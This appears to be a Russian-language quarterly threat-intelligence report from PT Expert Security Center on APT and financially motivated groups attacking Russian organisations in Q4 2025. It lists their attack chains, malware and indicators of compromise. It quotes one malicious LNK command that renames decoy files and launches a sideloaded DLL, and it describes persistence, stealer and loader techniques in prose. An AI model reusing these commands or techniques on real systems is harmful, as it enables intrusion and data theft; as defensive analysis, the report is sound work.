PT Expert Security Center

Анализ активности хакерских группировок, IV квартал 2025 г.

Анализ активности хакерских группировок, IV квартал 2025 г.

Введение

В IV квартале 2025 года департамент Threat Intelligence PT ESC продолжил мониторинг активности хакерских группировок, нацеленных на российские организации. В рамках отчетного периода внимание было сосредоточено на выявлении и сопоставлении повторяющихся паттернов атак, техник и семейств вредоносного ПО с ретроспективой предыдущих кварталов и лет (для более точной фиксации преемственности инструментов и изменений в тактике). Такой подход позволяет не только описывать отдельные инциденты, но и подтверждать устойчивые паттерны группировок на примере сопоставимых цепочек, как это показано в материалах по APT31 и NetMedved.

Параллельно анализировалась эволюция инструментария группировок в динамике отчетного года, включая изменения в составе инструментов, способах закрепления и скрытного управления, а также в подходах к получению первичного доступа. Наиболее показательным примером в этой части является ExCobalt, для которой характерна регулярная модификация компонентов и адаптация техник под конкретные инфраструктуры и условия эксплуатации. Отдельно фиксировались кейсы активности группировок, ранее не проявлявших выраженного фокуса на российском направлении, включая кампании Silver Fox с использованием фишинговых уведомлений от государственных ведомств.

Накопленные наблюдения по инцидентам и инструментарию дополняются анализом общей динамики за 2025 год: рост числа компьютерных атак и увеличение объема уникальных вредоносных семплов, ассоциированных с APT-группировками, указывают на ускорение цикла разработки и модификации вредоносного ПО. Одним из факторов, влияющих на эту тенденцию, является расширение возможностей по созданию и адаптации кода с использованием больших языковых моделей, которые упрощают разработку и повышают вариативность реализаций при сохранении типовых тактик и техник.

Больше информации об активности кибергруппировок можно получить на нашем портале PT Fusion.

Количество уникальных семплов ВПО, атрибутированных к APT-группировкам

С учетом указанных тенденций настоящая квартальная справка обобщает наблюдения по двум основным направлениям — по шпионской активности и финансово мотивированным атакам — и содержит краткие описания цепочек компрометации, используемых инструментов и ключевых индикаторов.

Шпионаж

АРТ31

Другие названияZirconium
Fair Werewolf
Violet Typhoon
Bronze Vinewood
Judgment Panda
Sheathminer
Начало активности2016
ИнструментыPlugX
CobaltStrike
AufTime
CloudyLoader
YaLeak
CloudSorcerer
OneDriveDoor
География атакБеларусь
Великобритания
Монголия
Норвегия
Россия
Сербия
США
Финляндия
Франция
Атакуемые отраслиВоенный сектор
Образование
Правительственный сектор
Производство
Сельское хозяйство
Телекоммуникации
Технологические компании
Финансовый сектор
Энергетика

В IV квартале 2025 года специалисты PT ESC по результатам расследований и сопоставления эпизодов за 2024–2025 годы связали часть целевых атак на российский IT-сектор с APT31, восстановили используемые тактики и техники, а также выявили ряд уникальных инструментов. Были отмечены два подтвержденных эпизода, отражающих получение и развитие доступа к инфраструктурам организаций:

  • декабрь 2024 года: APT31 использовала таргетированный фишинг с сопроводительным письмом якобы от менеджера по закупкам; во вложении — вредоносный архив «Требования.rar» с LNK-файлом, который запускал документ-приманку и CloudyLoader (загрузчик Cobalt Strike);
  • июль 2025 года: установлено, что злоумышленники имели доступ к инфраструктуре уже с конца 2022 года, а развитие атаки началось в новогодние праздники 2023 года.

После получения доступа к инфраструктуре APT31 переходила к сбору информации о среде и активности пользователей. Для этого применялись утилиты и скрипты, извлекающие данные из журналов Windows, а также вспомогательные инструменты для получения данных из браузеров, поиска файлов и извлечения пользовательских заметок (например, SharpADUserIP/SharpChrome/StickyNotesExtract). Инвентаризация сети и первичная сетевая разведка выполнялись с использованием Advanced IP Scanner.

Опираясь на результаты разведки, злоумышленники развивали доступ внутри периметра: создавали учетную запись локального администратора и использовали ее для перемещения между узлами, в том числе через RDP и инструменты WmiExec/SmbExec. Для получения учетных данных применялись как техники pass the hash, так и выгрузка веток реестра с последующим извлечением секретов с помощью secretsdump.py.

Устойчивость обеспечивалась за счет использования планировщика задач Windows: задания маскировались под легитимные, применялась техника скрытых задач — с удалением SecurityDescriptor в ветках TaskCache и удалением XML-файлов заданий из C:\Windows\System32\Tasks. Скрытное управление и обмен данными строились на легитимных веб-сервисах и облачных платформах с использованием зашифрованных туннелей через Tailscale и Microsoft dev tunnels. Следы активности на узлах скрывались среди прочего путем очистки журналов Windows с использованием wevtutil.

Как пример одной из зафиксированных цепочек: жертве приходит фишинговое письмо «от менеджера по закупкам» с архивом «Требования.rar».

Рисунок 1. Фишинговое письмо
Рисунок 1. Фишинговое письмо

Внутри архива находятся LNK-файл и PDF-документы-приманки.

Рисунки 2–5. Архив с LNK-файлом и PDF-документами

Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами
Архив с LNK-файлом и PDF-документами

При открытии ярлыка выполняется встроенная команда:

"C:\Windows\System32\cmd.exe" /c echo F | xcopy /h /y %cd%\Требования\Требования C:\Users\Public\Downloads\ & start %cd%\Требования\& ren C:\Users\Public\Downloads\Company.pdf nau.exe & ren C:\Users\Public\Downloads\Requirements.pdf BugSplatRc64.dll & C:\Users\Public\Downloads\nau.exe

Команда копирует вложенные файлы в C:\Users\Public\Downloads, открывает каталог с содержимым для создания видимости легитимного контекста, затем переименовывает два PDF в компоненты запуска (Company.pdf → nau.exe, Requirements.pdf → BugSplatRc64.dll) и запускает получившийся nau.exe. Далее реализуется DLL sideloading: при старте nau.exe подгружается библиотека BugSplatRc64.dll из того же каталога, в котором размещен вредоносный код. Исполнение полезной нагрузки инициируется не сразу: сначала реализуется перехват WinAPI-функции из семейства Message API, а уже в обработчике перехвата запускается основная логика вредоносного модуля.

Более подробное описание цепочки атаки, используемого вредоносного ПО и инфраструктуры приведено в статье «Атаки разящей панды: APT31 сегодня».

Доменыmoeodincovo[.]com
linuxsecuritycont[.]com
sohbetturke[.]com
rttvnews[.]com
IP-адреса89.23.113[.]44
Имена файловBugSplatRc64.dll
NVIDIADEBUG.dll
Program_handler.exe
YandexDisk.exe
pl_rsrc_english.dll
Контрольные суммы055736a8a5c22e188d3489a2b35d58ac
ca3820abd0331090c77116e2941f7b99
547c897644f770a682a548abe79aef65
9c719435fc6aa0b0f82cf2af5dbb7025
d6be7e21be054f3d63af6cea336db61a

ExCobalt

Другие названияShedding Zmiy
Red Likho
Cobalt Werewolf
Начало активности2023
ИнструментыADRecon
Advanced IP Scanner
Babuk
Dante Socks5
GSocket
Impacket
Leaked Wallpaper
LockBit
Octopus
PUMAKIT
Revsocks
География атакБеларусь
Индонезия
Россия
Сербия
Атакуемые отраслиАэрокосмическая промышленность 
Здравоохранение 
Индустрия гостеприимства 
Логистические компании 
Медиа 
Образование 
Правительственный сектор 
Производство 
Развлечения 
Розничная торговля 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Энергетика

ExCobalt сохраняет высокую интенсивность атак на российские организации, постоянно модифицируя свои средства и техники и адаптируя их под конкретные инфраструктуры и задачи. В IV квартале 2025 года специалисты PT ESC обобщили результаты расследований и разобрали обновленный инструментарий группы.

На входе в инфраструктуру ExCobalt все чаще делает ставку на более тихие способы получения первичного доступа: компрометацию подрядчиков и доступ через опубликованные RDP-сервисы.

В атаках применяется связка средств:

  • для удаленного управления и постэксплуатации используется бэкдор Cobint;
  • для построения каналов связи и маршрутизации трафика — сетевые туннели GSocket и Revsocks;
  • для шифрования инфраструктуры — Babuk для узлов Linux и гипервизоров VMware ESXi и LockBit для узлов Windows.

По мере развития доступа ExCobalt делает акцент на получении учетных данных и захвате доверенных каналов. В частности, используются техники компрометации Telegram через кражу каталога tdata на устройстве жертвы с последующей компрометацией учетной записи.

Рисунок 6. Завершение активных Telegram-сессий на всех устройствах
Рисунок 6. Завершение активных Telegram-сессий на всех устройствах

Также применяется стилер для Outlook Web Access, где вредоносный код внедряется в компонент Flogon, перехватывает учетные данные на этапе ввода и затем передает их злоумышленникам.

Рисунок 7. Модифицированный файл flogon.js
Рисунок 7. Модифицированный файл flogon.js

Один из способов закрепления в атакованной инфраструктуре, ранее не наблюдавшийся в арсенале ExCobalt, — размещение шеллов в виде отдельных файлов с расширением .epf, которые реализуют механизм внешних обработок в программных продуктах «1С». Такой подход позволяет злоумышленникам выполнять команды в среде «1С» — и сохранять контроль над атакованной средой за счет эксплуатации ее собственных механизмов.

Рисунок 8. Реконструкция RDP-сессии со следами загрузки различных шеллов
Рисунок 8. Реконструкция RDP-сессии со следами загрузки различных шеллов

В Linux-сегментах ExCobalt делает ставку на долговременную устойчивость и скрытность, развивая собственные компоненты. Ключевую роль играет руткит уровня ядра PUMAKIT, который маскирует присутствие и поддерживает скрытое управление. В практической реализации используются приемы исполнения без записи на диск, перехват системных вызовов для сокрытия артефактов и извлечения чувствительных данных, а также скрытые механизмы закрепления, включая подмешивание ключа в authorized_keys в оперативной памяти без изменения файла на диске. Управление реализуется через нетривиальный канал с использованием перехваченных системных функций и командных маркеров.

В качестве альтернативного и дополняющего механизма закрепления на Linux применяется инструмент Octopus, который решает задачи повышения привилегий и персистентности за счет модификации легитимных бинарных файлов и сервисов. Он включает набор эксплойтов для локального повышения привилегий и имеет функции внедрения полезной нагрузки в системные компоненты, включая модификацию легитимных утилит и патчинг бинарных файлов. Полезная нагрузка хранится внутри инструмента во встроенном виде, что повышает автономность и снижает зависимость от внешней доставки на этапе закрепления.

Более подробное описание инструментария ExCobalt, а также технические детали по каждому из перечисленных компонентов приведены в статье «(Ex)Cobalt. Обзор инструментов группы в атаках за 2024–2025 годы».

Доменыrhel.opsecurity1[.]art
sec.opsecurity1[.]art
qxpngendvvp1.wris[.]monster
cnhgenfhfp2.wris[.]monster
ccdertsfrp1.wris[.]monster
qdprtsorp2.wris[.]monster
cckitsfrp1.n3x1lo[.]pro
qdkitsorp2.n3x1lo[.]pro
cddcvesfhfp1.wris[.]monster
deefveskiip2.wris[.]monster
cumfpo90sing.agddns[.]net
procdia42ecte.agddns[.]net
viedeu98.agddns[.]net
laipros50.agddns[.]net
fira24sonstablee.agddns[.]net
chronback49in.duckdns[.]org
IP-адреса89.23.113[.]204
Контрольные суммы43cd2a19b815c609e3b5927d3ab59a67
bceac4f5287f6bf051c1d0c007e37ec8
a58aee3a597b38572ecff77a039a35a1
60d1462836deb5775e2fb7a345767f98
6c0bbb73250887335d7dfe6008d3a6a3
9b4081417f9f77225e280b92038d83e3
38e3824655c1b2cca7d8ad21469c59ae
034a56c1526af1ca76b0c368736d66ee
cf86d9ce0e1d5781b999dbb763d6536d
d8baba26b5450be7f1ec35616f4e0703
b2e48c9ab63e4e4a5cc76fcab6e832b0
6477933a1ca153ba23ade3c6ac14b878
ea6369c302257dd8650b9f30d3e4c4a3
3e281360bb3fe81745269cf04aab3add
2d8e0f4d649bffba0b13998ac2635b21
262d7599f1263409dbdc402e36658bd7
dede001b1c3aed205c243ac0de86d12f
fb461046a25b936abfbf89168d916e98
864ee7604990860e0959e118e3197a96
731ccbf1536f99d7c08707c2323b4259
00e6c33906e956aa744a928f19d858cf
0412d580628ec74f47bf4c80addefd1f
c72a27afeb2ea77a319c578ef5484d45
5a7618521010279e14a6b752fb32faf3

QuietCrabs

Другие названияSubtle Werewolf
UTA0178
UNC5221
Red Dev 61
Начало активности2023
ИнструментыKrustyLoader
BRICKSTORM
Sliver
География атакВеликобритания
Германия
Иран
Россия
США
Тайвань
Филиппины
Чехия
Южная Корея
Япония
Атакуемые отраслиВоенный сектор 
Здравоохранение 
Логистические компании 
Правительственный сектор 
Производство 
Телекоммуникации 
Технологические компании

В IV квартале 2025 года специалисты PT ESC в ходе расследования двух инцидентов в российских компаниях сопоставили артефакты атак и отнесли часть активности к QuietCrabs.

Для этой группировки характерна работа по модели массового сканирования интернет-сервисов организаций и последующей эксплуатации «RCE-уязвимости энного дня»: после появления публичных и работоспособных PoC и эксплойтов группа в сжатые сроки переходит к практической эксплуатации уязвимых сервисов, что сокращает окно между публикацией и реальной атакой и повышает требования к оперативному патчингу и регулярной проверке внешних сервисов на наличие незакрытых уязвимостей.

Рисунок 9. Атаки QuietCrabs
Рисунок 9. Атаки QuietCrabs

В одном из эпизодов злоумышленники эксплуатировали связку уязвимостей в Ivanti Endpoint Manager Mobile (CVE-2025-4427 и CVE-2025-4428), организуя удаленное выполнение команд с выводом результата в файл с расширением .jpg в веб-каталоге и дальнейшим считыванием этого вывода по HTTP.

Во втором эпизоде была зафиксирована эксплуатация уязвимости CVE-2025-53770 в Microsoft SharePoint, после чего развитие атаки на сервере происходило в таком порядке:

  • размещение веб-шелла для удаленного выполнения команд;
  • доставка и запуск загрузчика;
  • развертывание импланта;
  • установление соединения с C2-сервером.

На сервере SharePoint был размещен ASPX-веб-шелл, принимающий GET-параметры cmd и timeout и возвращающий результат выполнения команды; выполнение организовано через кодирование команды в Base64 и запуск посредством ScriptRunner.exe, а вывод записывался в файл в каталоге SharePoint, откуда веб-шелл считывал результаты и отдавал оператору.

Рисунок 10. Фрагмент ASPX-веб-шелла
Рисунок 10. Фрагмент ASPX-веб-шелла

Перед переходом к следующей стадии злоумышленники выполняли проверки работоспособности узла, включая получение внешнего IP-адреса и тест записи в каталог, после чего загружали KrustyLoader во внешний доступный путь и инициировали его выполнение.

KrustyLoader выступает в роли промежуточного загрузчика на Rust: он расшифровывает ссылку на полезную нагрузку, загружает ее и запускает через внедрение в целевой процесс. В наблюдаемых образцах отмечаются характерные признаки поведения: самокопирование и релокация в %TEMP% с шаблонами имен, содержащими маркеры __selfdelete__ и __relocated__, использование файла C:\Users\Public\Downloads\0 как параметра задержки, многоступенчатая расшифровка URL, а также внедрение в explorer.exe с запуском через RtlCreateUserThread и альтернативные ветки, допускающие загрузку дополнительной полезной нагрузки с последующим внедрением в другой процесс.

Финальной полезной нагрузкой в рассмотренной цепочке выступал Sliver — кроссплатформенный имплант для удаленного управления.

Более подробное описание тактик и техник QuietCrabs, а также разбор этапов атаки и инструментария приведены в статье «Dragons in Thunder».

Доменыdjango-server.s3.amazonaws[.]com
omnileadzdev.s3.amazonaws[.]com
spyne-test.s3.amazonaws[.]com
kia-almotores.s3.amazonaws[.]com
devscout.s3.amazonaws[.]com
tnegadge.s3.amazonaws[.]com
gaadhi.s3.amazonaws[.]com
check.learnstore[.]vip
music.learnstore[.]vip
update.learnstore[.]vip
api.learnstore[.]vip
IP-адреса213.183.54[.]111
216.45.58[.]177
223.76.236[.]178
223.76.236[.]179
23.95.193[.]164
156.238.224[.]82
8.211.157[.]186
Контрольные суммыf662135bdd8bf792a941ea222e8a1330
aed7eef30dbb0e95290b82d8cdb80cef
88c13ad71798482ab15da86fed33a09d
4336ce2c934bdabc0ef24ebc883a97b5
071d0f76e0af21f0a6903523abe90d33
120df631123af5a9273b0f9b3b7592d3
23439741ee63a4ff744e5c3ab1fbba3d
c4df40b8250a72ef394a6d844765cbda
070170515d7d1d982164a5a3dd96d5e3
6ca0408e78c732f533dee2bd84df9961

Rare Werewolf

Другие названияLibrarian Ghouls
Librarian Likho
Rezet
Начало активности2019
ИнструментыAnyDesk 
Blat
DefenderControl
MipkoEmployeeMonitor
Tuna
География атакБеларусь
Венгрия
Казахстан
Россия
Атакуемые отраслиАвиационная промышленность 
Аэрокосмическая промышленность 
Военный сектор 
Здравоохранение 
Индустрия гостеприимства 
Исследовательские организации 
Логистические компании 
Медиа 
Образование 
Правительственный сектор 
Производство 
Развлечения 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор
Энергетика

В течение IV квартала 2025 года Rare Werewolf проявляла активность против организаций из различных отраслей, используя универсальные легенды, привязанные к типовым бизнес-процессам — оформлению оплаты и договоров, актов, закупочной документации. Первичная доставка строилась на фишинговых письмах, стилизованных под продолжение деловой переписки или служебное уведомление, с вложением запароленного архива и передачей пароля в тексте сообщения.

Рисунки 11–14. Примеры фишинговых писем

После открытия вложения жертва получала «комплект документов»: документ-приманку в DOCX или PDF и исполняемый файл, замаскированный под «смету», «акт», «запрос» или «пакет документов».

Рисунок 15. Содержимое архива
Рисунок 15. Содержимое архива

При запуске исполняемого файла распаковывались скрипты, легитимные утилиты и вспомогательные компоненты, обеспечивающие дальнейшую цепочку исполнения. Сразу после старта пользователю открывалась приманка для отвлечения внимания, а параллельно загружалась следующая стадия в виде архива и распаковывалась средствами, доставленными на первом этапе.

Рисунки 16–17. Документы-приманки

На узел устанавливался AnyDesk, для закрепления компоненты добавлялись в автозагрузку, а конфигурационные данные AnyDesk из профиля пользователя и ProgramData упаковывались в архивы и эксфильтрировались через консольную почтовую утилиту с использованием заданного SMTP-сервера, что обеспечивало сохранение и восстановление доступа к удаленным сессиям.

Применяемая тактика соответствует наблюдениям предыдущего периода и не претерпела принципиальных изменений.

Доменыnpo-avia[.]online 
aviator-concern[.]site 
emailon[.]ru 
avia-rias[.]site 
users-office[.]ru 
qinformation[.]ru 
user-rembler[.]ru 
mail-rembler[.]ru 
email-offices[.]ru 
email-rembler[.]ru 
aoffices[.]ru 
users-offices[.]ru 
emailoffice[.]ru 
titan-barykady[.]site 
zakupky-ru[.]website 
emailoff[.]ru 
salut-vpk[.]site 
vniir-info[.]site 
winformation[.]ru 
user-mail[.]ru 
qqoffice[.]ru 
mail-rambler[.]ru
Имена файлов766.com
Исх. Письмо Рег. №81853.05 от 22.12.2025.scr
Подписанный договор,КП и оплата.com
Квитанция.scr
журнал регистрации договоров.com
Проект контракта.scr
Акт приёмки-сдачи услуг по Контракту . № 875-9.Исх. № 521.scr
журнал регистрации договоров РФ.pdf.scr
Контрольные суммыbc87ef4a3b522abb29b1008f347851a6
69c59e428adcea5a15f7093fa44e2db1
78ab5ae6dc215e4d76e476028a8fcb6f
da9e2d1e2090ca0c16e7014aa3f8024e
7050c3c774389a00a24d169098de1825
c2473271e40a806c20d356236522adf7
2215425569671b75c62a33569334b537
26a72cb8c9dfe7054cca6ab0d9372c41

PseudoGamaredon

Другие названияAwaken Likho
Core Werewolf
GamaCopy
Начало активности2021
ИнструментыMeshAgent
MeshСentral
UPX
UltraVNC 
MeshAgent
ReverseSSH
rclone
География атакБеларусь
Россия
Атакуемые отраслиВоенный сектор 
Здравоохранение 
Исследовательские организации 
Логистические компании 
Медиа 
Правительственный сектор 
Производство 
Розничная торговля 
Технологические компании 
Финансовый сектор

В IV квартале 2025 года группа киберразведки TI-департамента фиксировала фишинговую активность группировки PseudoGamaredon в адрес правительственного сектора и военно-промышленного комплекса.

Рассылка осуществлялась через электронные письма с архивами-приманками; внутри вложений размещался вредоносный исполняемый файл, а тематика сообщений имитировала официальную корреспонденцию и мобилизационно-учетную документацию.

После открытия замаскированного вредоносного ПО запускается цепочка, сочетающая документ-приманку и автоматизированное развертывание средств удаленного управления.

Рисунки 18–21. Документы-приманки

При запуске пользователем исполняемый файл разворачивает в системе компоненты первого стейджа (dilemma.cmd, распаковщик concrete.exe, архив conserve.rar) и запускает dilemma.cmd.

Рисунок 22. Содержимое dilemma.cmd
Рисунок 22. Содержимое dilemma.cmd

Скрипт распаковывает conserve.rar во внешний каталог пользователя, после чего запускает компоненты второго стейджа — nasty.cmd, grip.cmd и Teloversync.exe (UltraVNC).

Nasty.cmd выполняет подготовку окружения и закрепление: формирует конфигурационный файл UltraVNC, задавая параметры скрытности и удобства удаленного администрирования, после чего запускает grip.cmd. Дополнительно nasty.cmd закрепляется в системе через планировщик задач, регистрируя периодический запуск в скрытом режиме, чтобы цепочка регулярно восстанавливалась и перезапускала полезную нагрузку.

Grip.cmd отвечает непосредственно за запуск удаленного доступа и сетевую часть. Скрипт принудительно завершает ранее запущенный процесс Teloversync.exe, выполняет повторяющиеся проверки сетевой доступности через nslookup с паузами, формирует идентификатор узла на основе серийного номера системного диска и затем запускает Teloversync.exe с параметрами автоподключения к удаленному узлу управления по TCP-порту 443.

В результате на зараженной рабочей станции разворачивается устойчивый интерактивный удаленный доступ через UltraVNC, который поддерживается за счет регулярного перезапуска через планировщик заданий Windows.

Доменыkinomirok[.]ru
vdaliot[.]ru
ilyaforexperts[.]ru
dveri-kuban[.]ru
bunchahanoithuduc[.]com
IP-адреса178.255.127[.]86
91.217.81[.]90
45.132.255[.]152
195.2.70[.]182
45.128.148[.]46
45.144.67[.]251
Имена файловЗапрос прокуратуры Об анализе соблюдения законности при выполнении ГОЗ предприятиями ОПК РФ .exe
Уведомление № 221 о начале комплексной проверки согласно плану утечек-1-1.exe
Указания начальникам ВП об организации работы по .exe
Уведомление № 221 о начале комплексной проверки согласно плану утечек-копия-7.exe
Запрос на ПОВСК Расследования уголовного дела № 1240 на территории Октябрьского района СУ УМВД через ВСО.pdf
Контрольные суммыd63d6c9f6c10edb9a228756c9d9b7231
6c28713c6020a8759b902b4d90d78ac6
5842ddf4441c01f5e56051d5c4558b49
6606e5e028dbe2def716fa3c8364ed8f
e527cac6c22f38efa39935e48ffbab59

Финансово мотивированные группировки

Werewolves

Другие названияLone Wolf
Moonshine Trickster
Начало активности2023
ИнструментыLockBit
Cobalt Strike
География атакГана
Италия
Нидерланды
Россия
Атакуемые отраслиИндустрия гостеприимства
Логистические компании
Нефтегазовая промышленность
Производство
Розничная торговля
Телекоммуникации
Технологические компании
Финансовый сектор
Электроснабжение
Энергетика

Группа киберразведки в IV квартале 2025 года фиксировала фишинговую кампанию группировки Werewolves. Злоумышленники применяли стеганографию для скрытой доставки загрузчика и выстраивали многоступенчатую цепочку исполнения, завершающуюся запуском Cobalt Strike Beacon в памяти.

Первоначальный доступ реализуется через фишинговое письмо
с вложенным архивом, внутри которого размещены размытое изображение-приманка «досудебное.png» и ярлык «сверка.lnk».

Рисунок 23. Содержимое архива
Рисунок 23. Содержимое архива

Открытие ярлыка приводит к запуску PowerShell с параметрами скрытого окна и обходом политики выполнения.

Рисунок 24. Команда вредоносного LNK-файла
Рисунок 24. Команда вредоносного LNK-файла
Рисунок 25. Размытый PNG-контейнер
Рисунок 25. Размытый PNG-контейнер

Команда читает байты изображения, извлекает XOR-ключ из 145-го байта, находит в ASCII-представлении PNG-файла последний маркер чанка IDAT, затем декодирует данные, расположенные после него, сохраняет результат во временный каталог как %TEMP%\yVLQbWaX.exe — и запускает файл в скрытом режиме. Тем самым изображение используется как контейнер для бинарного стейджа; подход с извлечением полезной нагрузки из сегмента IDAT концептуально повторяет известный класс решений типа IDAT loader.

Далее запущенный yVLQbWaX.exe обращается к ezstat[.]ru/flowersforlove.gif; домен перенаправляет на контролируемый злоумышленниками ресурс valisi[.]ru, где размещен вредоносный HTA-файл. HTA-файл выполняется системной утилитой mshta.exe и содержит код на VBScript, который инициирует очередной запуск PowerShell: он распаковывает Base64-строку в gzip-данные с последующей распаковкой и запускает результат. Итоговый шеллкод соответствует Cobalt Strike Beacon; финальная стадия реализует бесфайловое выполнение в оперативной памяти за счет рефлективной загрузки.

Доменыvalisi[.]ru
ecols[.]ru
IP-адреса188.120.232[.]76
Имена файловсверка.lnk
досудебное.png
Контрольные суммыec2924d70d86d24e911202b1523c1858
bc957c0d268732c83c4b1a33a37a5854
38bcebee4a5c0a18a4794ad7c882e536
aed3b15ef7c731cdc8e84c0de42adcdc

NetMedved

Другие названияClubfoot Wolf
Начало активности2024
ИнструментыLumma
NetSupport
География атакРоссия
Атакуемые отраслиЛогистические компании
Розничная торговля

Группа киберразведки в октябре 2025 года зафиксировала продолжающуюся фишинговую активность группировки NetMedved, нацеленную на российские организации. В качестве конечной полезной нагрузки используется вредоносная сборка легитимного средства для удаленного администрирования NetSupport Manager (NetSupportRAT).

Первоначальный доступ реализуется через фишинговые рассылки с архивами, содержащими набор документов-приманок, имитирующих типовой документооборот российских компаний (карточки контрагентов, приказы о назначении, свидетельства о постановке на учет), а также замаскированный вредоносный LNK-файл, оформленный под очередной сопроводительный файл.

Рисунки 26–28. Содержимое архива

На рабочей станции жертвы LNK-файл запускает PowerShell в скрытом режиме, причем существенная часть логики вынесена прямо в командную строку ярлыка: это характерная особенность кампании.

Выполняются проверки, направленные на противодействие анализу:

  • По процессам: поиск работающих инструментов отладки и мониторинга (Procmon/Procmon64, Process Hacker, x64dbg/x32dbg, Wireshark, Fiddler, IDA).
  • По аппаратным признакам: выход при количестве логических процессов меньше 2 или разрешении экрана ниже порогов (ширина менее 800, высота менее 600).
Рисунок 29. Содержимое LNK-файла
Рисунок 29. Содержимое LNK-файла

При успешном прохождении проверок цепочка переходит к следующему шагу — развертыванию полезной нагрузки: PowerShell-сценарий создает рабочий каталог в LocalAppData, скачивает ZIP-архив, замаскированный под PDF, распаковывает его штатными средствами, открывает документ-приманку и параллельно запускает NetSupportRAT, после чего создает задачу в планировщике заданий Windows для автозапуска модуля при входе пользователя. В составе распакованного набора, помимо бинарных компонентов, присутствует конфигурационный файл client32.ini, в котором жестко заданы домены для подключения к серверам управления.

К концу октября — началу ноября 2025 года операторы расширили инфраструктуру и, помимо варианта с PowerShell-скриптом, использовали альтернативный способ получения и исполнения промежуточного командного блока, который запускает ту же логику развертывания полезной нагрузки: LNK-файл запускает cmd.exe, выполняет запрос finger к узлу api.metrics-strange[.]com и перенаправляет вывод команды напрямую в cmd для немедленного исполнения.

На этом этапе снова выполняются проверки против анализа, затем создается случайный путь в LocalAppData, через where находится легитимный curl, сохраняется его копия под случайным именем, выполняются загрузка ZIP-архива (маскировка под PDF), распаковка встроенной утилитой tar, открытие приманки и запуск NetSupportRAT через rundll32, после чего создается задача в планировщике для закрепления.

Более подробное описание цепочки атаки, используемого вредоносного ПО приведено в статье «„Медвед“ атакует: что мы узнали про фишинговую кампанию группировки, нацеленной на российские организации».

Доменыtvfilia[.]com
skillswar[.]com
pdfbypari[.]com
nicevn[.]net
metrics-strange[.]com
api.metrics-strange[.]com
x-projectlys[.]com
IP-адреса31.214.157[.]85
185.158.249[.]54
80.66.76[.]115
31.214.157[.]214
Контрольные суммы7c747a3bae1b6093273fb59be92947c8
fc53d4925a9e5f0a2d84bb7185da1874
f9b64f0da33c475658ea206a484d236f
1b8fef7767370b985214470cf4e56a24
7cb00849d03ffa13ab9e5b077e161608
01a43d17f909792addcc004bdd513963
192c0538c375d9c5064a39f07e5b3744
7cec93c66b8fce48eb393c176936d146
84677cb94f1772c22d9d82114a4a4038
435e3d7ab7f4939a00332f823a923c8f
219a47f8a1820d131fa90f0e15230197
8944560ed965974f843fc984e417457e
63a769becb77120637e242b5a3e41649
25f5b04a7cb54ae588235cf7cf3a89f4
0b314bd55b9a3e318e3c207e597f3e5f
002bca1bb5ccc22049aa918aafc174a7
ba454a50b727cd724066ce2cfd575b9d
d0f7cdde46cd23cb01d70c88b92e7080

Silver Fox

Другие названияVoid Arachne
Начало активности2024
ИнструментыValleyRAT
HoldingHands RAT
Gh0stCringe RAT
Sainbox RAT
География атакВьетнам
Индия
Китай
Малайзия
Россия
Сингапур
США
Таиланд
Тайвань
Филиппины
Южная Корея
Япония
Атакуемые отраслиПравительственный сектор
Здравоохранение
Образование
Розничная торговля
Телекоммуникации
Финансовый сектор

Группа киберразведки департамента Threat Intelligence PT ESC зафиксировала фишинговую кампанию финансово мотивированной группировки Silver Fox.

В ходе исследования были обнаружены атаки на несколько российских банков: письма рассылались с домена onmbv[.]com, зарегистрированного 14 сентября 2025 года и используемого в качестве инфраструктурной базы для рассылки. Сообщения имитировали уведомления якобы от ФНС о налоговой проверке и побуждали получателей скачать «пакет документов» во вложенном архиве.

Рисунок 30. Фишинговое письмо
Рисунок 30. Фишинговое письмо

Архивы содержали набор файлов, включая исполняемый файл, несколько DLL и PNG-файлов, при этом ключевую роль в цепочке играли три объекта — исполняемый файл-декой с PDF-иконкой, библиотека QQMusicCommon.dll и изображение 9LmcIWuG.png. Исполняемый файл сам по себе не содержал вредоносной логики и использовался как контейнер запуска, а также как элемент социальной инженерии; на VirusTotal он встречался под разными названиями и загружался из разных регионов, включая Россию и Тайвань.

Рисунок 31. Содержимое архива
Рисунок 31. Содержимое архива

Дальнейшая эксплуатация строилась на технике DLL sideloading. При запуске исполняемый файл подгружал QQMusicCommon.dll, маскирующуюся под компонент популярного китайского сервиса QQ Music. Библиотека была обфусцирована, и в итоге выполняла роль дроппера: она считывала и расшифровывала полезную нагрузку из PNG-файла 9LmcIWuG.png и запускала полученный модуль. Таким образом, основная вредоносная функциональность доставлялась скрытно, а контейнером для полезной нагрузки выступало изображение.

Во всех выявленных на российском направлении случаях финальной полезной нагрузкой являлся ValleyRAT, для связи с управляющей инфраструктурой использовался C2-сервер на IP-адресе 207.56.138[.]28. ValleyRAT представляет собой троян удаленного доступа на C++, позволяющий злоумышленникам выполнять удаленные команды, наблюдать за активностью на устройстве, похищать данные и доставлять дополнительные модули. По ряду оценок, он функционально близок к семейству Gh0st RAT, но рассматривается как отдельное ПО со схожими возможностями, активно распространяемое с 2023 года через фишинг и поддельные установщики.

Параллельно в ходе анализа были выявлены многочисленные архивы, ориентированные на индийские организации и использующие схожую легенду от имени Central Board of Direct Taxes. Для части индийских артефактов использовалась та же инфраструктура управления, однако был обнаружен также дополнительный C2-сервер 108.187.37[.]85, характерный преимущественно для индийского трека. Независимо от конкретного C2-сервера цепочка оставалась неизменной: архив с декойным .exe-файлом, загрузка вредоносной DLL через DLL sideloading и извлечение ValleyRAT из изображения. Отдельные загрузки фиксировались также из Непала и Индонезии, но основной массив артефактов относился к Индии; активность против индийских компаний началась раньше, чем против российских, и датируется началом декабря 2025 года.

С учетом повторяемых техник, используемого стека и инфраструктурных признаков, а также ранее описанных кейсов использования ValleyRAT в финансово мотивированных цепочках наиболее вероятной является атрибуция активности группировке Silver Fox, известной многоступенчатыми цепочками доставки с применением sideloading и скрытой упаковки полезной нагрузки.

IP-адреса207.56.138[.]28
108.187.37[.]85
Имена файловФНС России -.zip
Контрольные суммы76fb10281c43c227faae7090736939f2
997ee6c829a977efe1c31b66b5ec49f9
2b6d74dd1a3d7d715a0c7057d7347a9e
ab9794c41cc40f72a304c6556bf8b377
c11d05f0432ca97e5029c4f26feb52e7
b4b0a91ae6c511c6cdb5b17a98f6e261
